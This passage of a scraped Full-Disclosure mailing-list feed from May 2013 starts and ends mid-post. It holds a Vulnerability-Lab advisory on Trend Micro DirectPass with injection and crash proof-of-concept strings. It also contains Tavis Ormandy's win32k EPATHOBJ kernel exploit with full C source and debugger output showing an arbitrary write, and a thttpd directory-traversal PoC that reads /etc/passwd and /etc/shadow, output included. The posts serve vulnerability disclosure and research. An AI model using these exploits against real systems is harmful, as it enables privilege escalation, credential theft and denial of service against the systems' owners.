Trend Micro (Reference): http://esupport.trendmicro.com/solution/en-US/1096805.aspx
Trend Micro Solution ID: 1096805

Video: http://www.vulnerability-lab.com/get_content.php?id=951


VL-ID:
=====
894


Common Vulnerability Scoring System:
====================================
6.1


Introduction:
=============
Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to 
remember one password. Other features include: Keystroke encryption, secure password generation, automatic 
form-filling, confidential notes, and a secure browser.

Convenience - You can securely and easily manage passwords for numerous online accounts with just one 
password and automatically login to your websites with one click. More Security - You get an extra layer of 
online security with a specially designed browser for online banking and financial websites and protection 
from keylogging malware. No Hassles – You don’t have to be a technical wizard to benefit from this password 
service, it’s simple to use. Confidence – You can have peace-of-mind using a password service provided by 
an Internet security provider with 20+ years of experience. All Your Devices – You can use DirectPass 
password manager on Windows PCs, Android mobile, Android Tablet, iPads and iPhones, and all devices are 
automatically encrypted and synchronized using the cloud.

(Copy of the Vendor Homepage: http://www.trendmicro.com/us/home/products/directpass/index.html )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.


Report-Timeline:
================
2013-03-08: Researcher Notification &amp;amp; Coordination (Benjamin Kunz Mejri)
2013-03-09: Vendor Notification (Trend Micro - Security Team)
2013-03-16: Vendor Response/Feedback (Trend Micro - Karen M.)
2013-05-09: Vendor Fix/Patch (Trend Micro - Active Update Server)
2013-05-15: Vendor Fix/Patch (Trend Micro - Solution ID &amp;amp; Announcement)
2013-05-21: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
=======================
Local


Severity:
=========
High


Details:
========
1.1
A local command injection vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software.
The vulnerability allows local low privileged system user accounts to inject system specific commands or local 
path requests to compromise the software.

The vulnerability is located in the direct-pass master password setup module of the Trend Micro InstallWorkspace.exe file.
The master password module of the software allows users to review the included password in the second step for security 
reasons. The hidden protected master password will only be visible in the check module when the customer is processing to 
mouse-over onto the censored password field. When the software is processing to display the hidden password in plain, the 
command/path injection will be executed out of the not parsed master password context in the field listing.

Exploitation of the vulnerability requires a low privilege system user account with direct-pass access and low or medium 
user interaction. Successful exploitation of the vulnerability results in software and system process compromise or 
execution of local system specific commands/path.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password)


1.2
A persistent input validation vulnerability is detected in the official Trend Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with a low privileged system user account to implement/inject malicious script code on 
the application side (persistent) of the software.

The persistent web vulnerability is located in the direct-pass check module when processing to list a manipulated master password. 
In step one, the attacker injects a malicious iframe in the hidden fields as master password. The inserted context will be saved and the execution 
will be in the next step when processing to list the master password context in the last check module. To bypass the validation 
and execute the injected script code the attacker needs to split (%20) the input request.

Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), persistent phishing, 
persistent external redirects to malware or scam and persistent web context manipulation of the affected vulnerable module.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Module(s):
[+] Setup Master Password

Vulnerable Parameter(s):
[+] Master Password

Affected Module(s):
[+] Check Listing (Master Password) 



1.3
A critical pointer vulnerability (DoS) is detected in the official Trend Micro DirectPass v1.5.0.1060 Software.
The bug allows local attackers with a low privileged system user account to crash the software via a pointer vulnerability.

The pointer vulnerability is also located in the direct-pass master password listing section. Attackers can inject scripts with 
loops to mouse-over multiple times the hidden password check listing of the master password. The result is a stable crash down 
of the InstallWorkspace.exe. The problem occurs in the libcef.dll (1.1.0.1044) of the trend micro direct-pass software core.

Exploitation of the vulnerability requires medium user interaction and a low privilege system user account with direct-pass.
Successful exploitation of the denial of service vulnerability can lead to a software core crash and also stable software module hangups.

Vulnerable File(s):
[+] InstallWorkspace.exe

Vulnerable Library:
[+] libcef.dll (Dynamic Link Library)

Vulnerable Module(s):
[+] Check Listing (Master Password) 

Vulnerable Parameter(s):
[+] Master Password


Proof of Concept:
=================
1.1
The code injection vulnerability can be exploited by local attackers with a privileged system user account and medium or high user interaction. 
For demonstration or to reproduce ...

PoC:
B%20&amp;gt;"&amp;gt;../;'[COMMAND|PATH INJECT!]&amp;gt;
Example Path: C:\Users\BKM\TrendMicro DirectPass

Note: The bug allows attackers to request local restricted folders with the system software privileges to manipulate software files and the 
bound dynamic link libraries.


1.2
The persistent script code inject vulnerability can be exploited by local attackers with a privileged system user account and medium 
or high user interaction. For demonstration or to reproduce ...

PoC: (Input)
B%20&amp;gt;"&amp;lt;iframe src=a&amp;gt;[PERSISTENT SCRIPT CODE!]

Note: The master password is restricted to 20 chars per field on insert. The execution of persistent injected frames works also with external source.


1.3
The pointer (DoS) vulnerability can be exploited by local attackers with a privileged system user account and low, medium or high user interaction.
For demonstration or to reproduce ...

Path: C:\Downloadz\TrendMicro_DP_MUI_Download\Package\Share\UI
Dynamic Link Library: libcef.dll

PoC: (Input)
%20%000000---%000%20

Note: The string crashes the master password check review module and the installworkspace.exe software process via a null pointer (DoS) bug.
Reproducing the vulnerability can result in a permanent denial of service when the context is saved in the first instance and the save 
has been canceled.

Critical Note: When I was checking the section I was thinking about how to use the injected code in the section to get access to the stored password.
I was processing to load my debugger and attached it to the process when the request was successful and saved the address.
After that I reproduced the same request with the attached debugger and exploited the issue in the local cloud software mask.
Then I was reviewing the changes and was able to use the injected frame test to see the location of the memory in the debugger. 
By processing to inject more and more context I was able to see where the location of the password in the memory has been stored when the software 
is processing to redisplay the saved temp password. Until today I have never seen this kind of method in any book or paper but I am sure I will 
soon write about the incident.


Solution:
=========
Both vulnerabilities can be patched by a secure parse or encode of the master password listing in the master password check module of the software.
Filter and parse the master password and description security tip input fields.
For the denial of service issue no solution is available yet, but the fixes will prevent the manual exploitation of the issue.


Note: The update is available from the update-server since the 12th of May but Trend Micro says it was the 9th of May.
On the 18th we downloaded the main software direct-pass again and tested the core without an update and it was still vulnerable.
To fix the issue in the software an update from the update-server is required after the install.


Risk:
=====
1.1
The security risk of the local command/path injection software vulnerability in the directpass software core is estimated as high(-).

1.2
The security risk of the persistent script code inject vulnerability is estimated as medium(+).

1.3
The security risk of the pointer (DoS) software vulnerability is estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm&amp;lt; at &amp;gt;vulnerability-lab.com)


&lt;/pre&gt;</description>
    <dc:creator>Vulnerability Lab</dc:creator>
    <dc:date>2013-05-20T23:29:19</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89367">
    <title>Re: exploitation ideas under memory pressure</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89367</link>
    <description>&lt;pre&gt;
I guess I'm talking to myself, maybe this list is all about XSS now ;)

I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.

First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:

.text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD                 cmp     eax, 1               ; Check for failure
.text:BFA122C0                 jz      short continue
.text:BFA122C2                 xor     eax, eax             ; Exit early
.text:BFA122C4                 jmp     early_exit

So we create a list node like this:

PathRecord-&amp;gt;Next    = PathRecord;
PathRecord-&amp;gt;Flags   = 0;

Then EPATHOBJ::bFlatten() spins forever doing nothing:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
    /* ... */

    for ( ppr = ppath-&amp;gt;pprfirst; ppr; ppr = ppr-&amp;gt;pprnext )
    {
      if ( ppr-&amp;gt;flags &amp;amp; PD_BEZIER )
      {
        ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
      }
    }

    /* ... */
}

While it's spinning, we clean up in another thread, then patch the thread (we
can do this, because it's now in userspace) to trigger the exploit. The first
block of pprFlattenRec does something like this:

    if ( pprNew-&amp;gt;pprPrev )
      pprNew-&amp;gt;pprPrev-&amp;gt;pprnext = pprNew;

Let's make that write to 0xCCCCCCCC.

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{

    // This routine waits for a mutex object to timeout, then patches the
    // compromised linked list to point to an exploit. We need to do this.
    LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex&amp;lt; at &amp;gt;%p",
                       GetCurrentThreadId(),
                       Mutex);

    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
        // It looks like the main thread is stuck in a call to FlattenPath(),
        // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
        // up, and then patch the list to trigger our exploit.
        while (NumRegion--)
            DeleteObject(Regions[NumRegion]);

        LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &amp;amp;PathRecord-&amp;gt;next, &amp;amp;ExploitRecord);

        InterlockedExchangePointer(&amp;amp;PathRecord-&amp;gt;next, &amp;amp;ExploitRecord);

    } else {
        LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
    }

    return 0;
}

    PathRecord-&amp;gt;next    = PathRecord;
    PathRecord-&amp;gt;prev    = (PVOID)(0x42424242);
    PathRecord-&amp;gt;flags   = 0;

    ExploitRecord.next  = NULL;
    ExploitRecord.prev  = 0xCCCCCCCC;
    ExploitRecord.flags = PD_BEZIERS;

Here's the output on Windows 8:

kd&amp;gt; g
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 50, {cccccccc, 1, 8f18972e, 2}

*** WARNING: Unable to verify checksum for ComplexPath.exe
*** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )

Followup: MachineOwner
---------

nt!RtlpBreakWithStatusInstruction:
810f46f4 cc              int     3
kd&amp;gt; kv
ChildEBP RetAddr  Args to Child              
a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame &amp;lt; at &amp;gt; a03aba2c)
a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame &amp;lt; at &amp;gt; a03abc14)
0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
WARNING: Stack unwind information not available. Following frames may be wrong.
0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
kd&amp;gt; .trap a03aba2c
ErrCode = 00000002
eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
win32k!EPATHOBJ::pprFlattenRec+0x82:
8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
kd&amp;gt; vertarget
Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 9200.16581.x86fre.win8_gdr.130410-1505
Machine Name:
Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
System Uptime: 0 days 0:02:30.432
kd&amp;gt; .bugcheck
Bugcheck code 00000050
Arguments cccccccc 00000001 8f18972e 00000002

Demo code attached. I have a working exploit that grants SYSTEM on all
currently supported versions of Windows. Code is available on request to
students from reputable schools.

If nobody else on the list can figure out the final details, then I've
lost faith in the next generation ;)

Tavis.

#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;assert.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;winnt.h&amp;gt;
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include &amp;lt;ntstatus.h&amp;gt;

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy &amp;lt;taviso&amp;lt; at &amp;gt;cmpxchg8b.com&amp;gt;, March 2013
//

POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN        Regions[MAX_REGIONS];
ULONG       NumRegion;
HANDLE      Mutex;

// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

BOOL LogMessage(LEVEL Level, PCHAR Format, ...);

// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010

typedef struct  _POINTFIX
{
    ULONG x;
    ULONG y;
} POINTFIX, *PPOINTFIX;

// Approximated from reverse engineering.
typedef struct _PATHRECORD {
    struct _PATHRECORD *next;
    struct _PATHRECORD *prev;
    ULONG               flags;
    ULONG               count;
    POINTFIX            points[0];
} PATHRECORD, *PPATHRECORD;


PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord;

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{

    // This routine waits for a mutex object to timeout, then patches the
    // compromised linked list to point to an exploit. We need to do this.
    LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex&amp;lt; at &amp;gt;%p",
                       GetCurrentThreadId(),
                       Mutex);

    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
        // It looks like the main thread is stuck in a call to FlattenPath(),
        // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
        // up, and then patch the list to trigger our exploit.
        while (NumRegion--)
            DeleteObject(Regions[NumRegion]);

        LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &amp;amp;PathRecord-&amp;gt;next, &amp;amp;ExploitRecord);

        InterlockedExchangePointer(&amp;amp;PathRecord-&amp;gt;next, &amp;amp;ExploitRecord);

    } else {
        LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
    }

    return 0;
}

int main(int argc, char **argv)
{
    HANDLE      Thread;
    HDC         Device;
    ULONG       Size;
    HRGN        Buffer;
    ULONG       PointNum;
    ULONG       Count;

    // Create our PATHRECORD in userspace we will get added to the EPATHOBJ
    // pathrecord chain.
    PathRecord = VirtualAlloc(NULL,
                              sizeof(PATHRECORD),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);

    LogMessage(L_INFO, "Alllocated userspace PATHRECORD&amp;lt; at &amp;gt;%p", PathRecord);

    // Initialise with recognisable debugging values.
    FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);

    PathRecord-&amp;gt;next    = PathRecord;
    PathRecord-&amp;gt;prev    = (PVOID)(0x42424242);

    // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
    // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
    // loop in EPATHOBJ::bFlatten().
    PathRecord-&amp;gt;flags   = 0;

    LogMessage(L_INFO, "  -&amp;gt;next  &amp;lt; at &amp;gt; %p", PathRecord-&amp;gt;next);
    LogMessage(L_INFO, "  -&amp;gt;prev  &amp;lt; at &amp;gt; %p", PathRecord-&amp;gt;prev);
    LogMessage(L_INFO, "  -&amp;gt;flags &amp;lt; at &amp;gt; %u", PathRecord-&amp;gt;flags);

    ExploitRecord.next  = NULL;
    ExploitRecord.prev  = 0xCCCCCCCC;
    ExploitRecord.flags = PD_BEZIERS;

    LogMessage(L_INFO, "Creating complex bezier path with %#x", (ULONG)(PathRecord) &amp;gt;&amp;gt; 4);

    // Generate a large number of Bezier Curves made up of pointers to our
    // PATHRECORD object.
    for (PointNum = 0; PointNum &amp;lt; MAX_POLYPOINTS; PointNum++) {
        Points[PointNum].x      = (ULONG)(PathRecord) &amp;gt;&amp;gt; 4;
        Points[PointNum].y      = (ULONG)(PathRecord) &amp;gt;&amp;gt; 4;
        PointTypes[PointNum]    = PT_BEZIERTO;
    }

    // Switch to a dedicated desktop so we don't spam the visible desktop with
    // our Lines (Not required, just stops the screen from redrawing slowly).
    SetThreadDesktop(CreateDesktop("DontPanic",
                     NULL,
                     NULL,
                     0,
                     GENERIC_ALL,
                     NULL));

    Mutex = CreateMutex(NULL, TRUE, NULL);

    // Get a handle to this Desktop.
    Device = GetDC(NULL);

    // Spawn a thread to cleanup
    Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);

    // We need to cause a specific AllocObject() to fail to trigger the
    // exploitable condition. To do this, I create a large number of rounded
    // rectangular regions until they start failing. I don't think it matters
    // what you use to exhaust paged memory, there is probably a better way.
    //
    // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
    // failure. Seriously, do some damn QA Microsoft, wtf.

    for (Size = 1 &amp;lt;&amp;lt; 26; Size; Size &amp;gt;&amp;gt;= 1) {
        while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
            NumRegion++;
    }

    LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);


    LogMessage(L_INFO, "Flattening curves...");

    // Begin filling the free list with our points.
    for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
        BeginPath(Device);
        PolyDraw(Device, Points, PointTypes, PointNum);
        EndPath(Device);
        FlattenPath(Device);
        FlattenPath(Device);
        EndPath(Device);
    }

    LogMessage(L_INFO, "No luck, cleaning up");

    // If we reach here, we didn't trigger the condition. Let the other thread know.
    ReleaseMutex(Mutex);

    ReleaseDC(NULL, Device);
    WaitForSingleObject(Thread, INFINITE);

    return 0;
}

// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
{
    CHAR Buffer[1024] = {0};
    va_list Args;

    va_start(Args, Format);
        vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
    va_end(Args);

    switch (Level) {
        case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
        case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
        case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
        case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break;
    }

    fflush(stdout);
    fflush(stderr);

    return TRUE;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/&lt;/pre&gt;</description>
    <dc:creator>Tavis Ormandy</dc:creator>
    <dc:date>2013-05-20T21:35:54</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89366">
    <title>Re: My ISP is routing traffic to privateaddresses...</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89366</link>
    <description>&lt;pre&gt;Maybe when we cut over to IPv6 the ISPs will revert to the golden age of
putting all their gear on publicly addressable space :)

Conversely, an enjoyable network design is where you route public IPs from
a private network to a private network, and the public IP has different
services on the internet to the internally routed version, but clients need
access to both.

NATing heaven.
&lt;/pre&gt;</description>
    <dc:creator>Patrick Webster</dc:creator>
    <dc:date>2013-05-20T16:19:03</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89365">
    <title>Critical issues affecting multiple game engines</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89365</link>
    <description>&lt;pre&gt;
We have just released a paper [1], in which we detail several 0-day
issues affecting a number of different game engines, including: Unreal
Engine, CryEngine 3 and idTech 4.

During our presentation at the recent NoSuchCon conference in Paris, we
discussed [2] additional details about game engine issues. Additionally
we demonstrated [3] how an attacker can use master servers to perform
mass exploitation of game vulnerabilities, in order to target and potentially
take down entire game networks.


[1] http://revuln.com/files/ReVuln_Game_Engines_0days_tale.pdf
[2] http://revuln.com/files/Ferrante_Auriemma_Exploiting_Game_Engines.pdf
[3] http://vimeo.com/66027238


---
ReVuln
http://revuln.com
http://twitter.com/revuln
http://revuln.com/revuln.asc


&lt;/pre&gt;</description>
    <dc:creator>ReVuln</dc:creator>
    <dc:date>2013-05-20T11:46:11</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89364">
    <title>Re: My ISP is routing traffic to privateaddresses...</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89364</link>
    <description>&lt;pre&gt;Because private addresses have no global meaning, routing information
   about private networks shall not be propagated on inter-enterprise
   links, and packets with private source or destination addresses
   should not be forwarded across such links. Routers in networks not
   using private address space, especially those of Internet service
   providers, are expected to be configured to reject (filter out)
   routing information about private networks. If such a router receives
   such information the rejection shall not be treated as a routing
   protocol error.



On 18 May 2013 14:55:08, Justin Elze &amp;lt;formulals1&amp;lt; at &amp;gt;gmail.com&amp;gt; wrote:
&lt;/pre&gt;</description>
    <dc:creator>Alexander Georgiev</dc:creator>
    <dc:date>2013-05-20T10:00:53</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89363">
    <title>Defense in depth -- the Microsoft way</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89363</link>
    <description>&lt;pre&gt;Hi @ll,

the "Microsoft Installer" creates for applications installed via an
.MSI the following uninstall information in the Windows registry
(see &amp;lt;http://msdn.microsoft.com/library/aa372105.aspx&amp;gt;):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall]
"UninstallString"="MsiExec.Exe /X{&amp;lt;GUID&amp;gt;}"
"ModifyPath"="MsiExec.Exe /I{&amp;lt;GUID&amp;gt;}"

Note the unqualified path to the executable "msiexec.exe".

On Windows installations without the "SafeProcessSearchMode" hotfix
(cf. &amp;lt;http://support.microsoft.com/kb/905890&amp;gt;) or with this safeguard
turned off (cf. &amp;lt;http://msdn.microsoft.com/library/dd266735.aspx&amp;gt;,
which refers to &amp;lt;http://support.microsoft.com/kb/959426&amp;gt; alias MS09-015),
an executable "msiexec.exe" placed in the CWD or the user's "base"
directory (addressed by "%HOMEDRIVE%%HOMEPATH%" and typically equal to
"%USERPROFILE%") can be run instead of the intended executable
"%SystemRoot%\System32\MsiExec.Exe".


The VERY simple fix (which eliminates this attack vector completely):
always use fully-qualified paths to the well-known executables.

JFTR: cf. &amp;lt;http://seclists.org/fulldisclosure/2011/Sep/160&amp;gt;

Stefan Kanthak

&lt;/pre&gt;</description>
    <dc:creator>Stefan Kanthak</dc:creator>
    <dc:date>2013-05-19T15:40:57</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89362">
    <title>Thttpd 2.25b Directory Traversal Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89362</link>
    <description>&lt;pre&gt;Hi guys,
You can find the software affected at http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz 
Thanks,
Metropolis
###########################################
#
# Software Name : Thttpd 2.25b
#
# Version :  2.25b (29dec2003)
#
# Bug Type : Directory Traversal Vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/05/2013
#
# Download app : http://www.acme.com/software/thttpd/thttpd-2.25b.tar.gz
#
#
###########################################
 
PoC :
 
127.0.0.1:80/../../../../../../../../etc/passwd


127.0.0.1:80/../../../../../../../../etc/shadow 
 

Example :
 
metropolis@Linuxbox ~ $ GET 127.0.0.1:80/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/bin/false
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
named:x:70:70:Named:/var/named:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
junkbust:x:73:73::/etc/junkbuster:/bin/bash
mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
pvm:x:24:24::/usr/share/pvm3:/bin/bash
user:$1$DjTSjByw$IQj8EmL4l7b0tLWbUTOrX0:0:0:Linux User,,,:/home/user:/bin/sh

&lt;/pre&gt;</description>
    <dc:creator>metropolis  haxor</dc:creator>
    <dc:date>2013-05-19T20:12:04</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89361">
    <title>Interesting referrer URLs when accessing vulnerability disclosure information</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89361</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello list,

In the aftermath of most of my full-disclosure posts I've observed
quite interesting referrer URLs when someone tries to read information
provided explaining the issue. In quite some cases, those requests can
be attributed to national CERTs, software distributors' security
teams, universities with IT-security research units, ... accessing
that information.

Information leaked via the referrer URLs indicates that a noticeable
number of security experts do not exercise strict separation of their
internal working processes, e.g. accessing their internal
wiki/mantis/communication/... systems, from the context used for
accessing POC data. In rare cases even session IDs are encoded in the URL.

A malicious attacker could use the disclosure of e.g. an unrelated
zero day to compromise especially machines of CERT/DoD/.. or get at
least hints, who is interested in his material, e.g. by requests like

[Some-IP] - - [14/May/2013:17:44:38 +0000] "GET
/Security/2012/LinuxKernelBinfmtScriptStackDataDisclosure/ HTTP/1.1"
200 7707
"http://rcf.mitre.org/~coley/cve-content/coffin-train-source-complex.html"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"

hd

PS: just curious: I would be interested in what
coffin-train-source-complex.html is about; perhaps someone having access
to the source could forward me a copy.

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlGZSDAACgkQxFmThv7tq+5J+ACdEFZ0zaucMaKsxCyfM7DbAAi2
1RgAn1SK6mcFxFdjAw3GOkzrikiQlCAd
